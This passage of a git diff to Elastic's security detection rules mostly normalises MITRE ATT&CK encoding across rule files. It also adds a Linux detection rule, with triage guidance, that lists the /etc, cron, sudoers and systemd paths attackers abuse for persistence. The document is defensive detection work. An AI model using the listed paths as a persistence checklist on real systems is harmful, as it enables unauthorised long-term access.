47, + "rule_id": "1b0b4818-5655-409b-9c73-341cac4bb73f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + }, + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "1b0b4818-5655-409b-9c73-341cac4bb73f_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json index bd6a8921b64..c0d7dcddda1 100644 --- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json index 6828730d76a..ea29284d620 100644 --- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json index 713a8c06bb5..17bf3e88bd8 100644 --- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json index 70ae5a2e063..a418d9f619b 100644 --- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json index 17ef5f7cc15..0f345bdf71d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json index bba5911de70..60f8613f5eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json index 1a5b9326bed..440f083f4ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json index a40fe4f5378..71a71022de4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json index 35aeebcc521..37173812ee4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json index fa0433b5b60..a4f29104aa4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json index e51c16abbdc..27ed1dadeb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json index c5cb6b9ca42..bcd79bf167f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json index 54de15f5bbd..52f512b3c02 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json index d7fc30c021b..4bc94859c50 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json index 6389bdd07a0..473eef23438 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json b/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json index c97a9348435..37fc240e29c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json index 18ada37843a..2670e27a834 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json index 1709badc4a8..e57c94405da 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json index b21d56c5aac..e9d3943472c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -133,7 +133,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json index 9ed472bd45a..a153140d1f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -133,7 +133,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json index f2c7d10368a..cd481286ca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -132,7 +132,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json index bbb734dd39d..1d77da810a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -137,7 +137,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json index 977d9c55870..ca087321879 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -138,7 +138,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json index 0a0a3fece86..11433945b22 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -139,7 +139,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json index b7169efb789..7cd92a7e2e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -139,7 +139,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_111.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_111.json new file mode 100644 index 00000000000..3ba4fd96204 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_111.json @@ -0,0 +1,171 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation in /etc for Persistence", + "note": "## Triage and analysis\n\n### Investigating Suspicious File Creation in /etc for Persistence\n\nThe /etc/ directory in Linux is used to store system-wide configuration files and scripts.\n\nBy creating or modifying specific system-wide configuration files, attackers can leverage system services to execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors for the creation of the most common system-wide configuration files and scripts abused by attackers for persistence. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n- Investigate whether any other files in any of the commonly abused directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Cron Job Created or Changed by Previously Unknown Process - ff10d4d8-fea7-422d-afb1-e5a2702369a9\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"linux\" and event.type in (\"creation\", \"file_create_event\") and user.name == \"root\" and\nfile.path : (\"/etc/ld.so.conf.d/*\", \"/etc/cron.d/*\", \"/etc/sudoers.d/*\", \"/etc/rc.d/init.d/*\", \"/etc/systemd/system/*\",\n\"/usr/lib/systemd/system/*\") and not process.executable : (\"*/dpkg\", \"*/yum\", \"*/apt\", \"*/dnf\", \"*/rpm\", \"*/systemd\",\n\"*/snapd\", \"*/dnf-automatic\",\"*/yum-cron\", \"*/elastic-agent\", \"*/dnfdaemon-system\", \"*/bin/dockerd\", \"*/sbin/dockerd\",\n\"/kaniko/executor\", \"/usr/sbin/rhn_check\") and not file.extension in (\"swp\", \"swpx\", \"tmp\")\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more 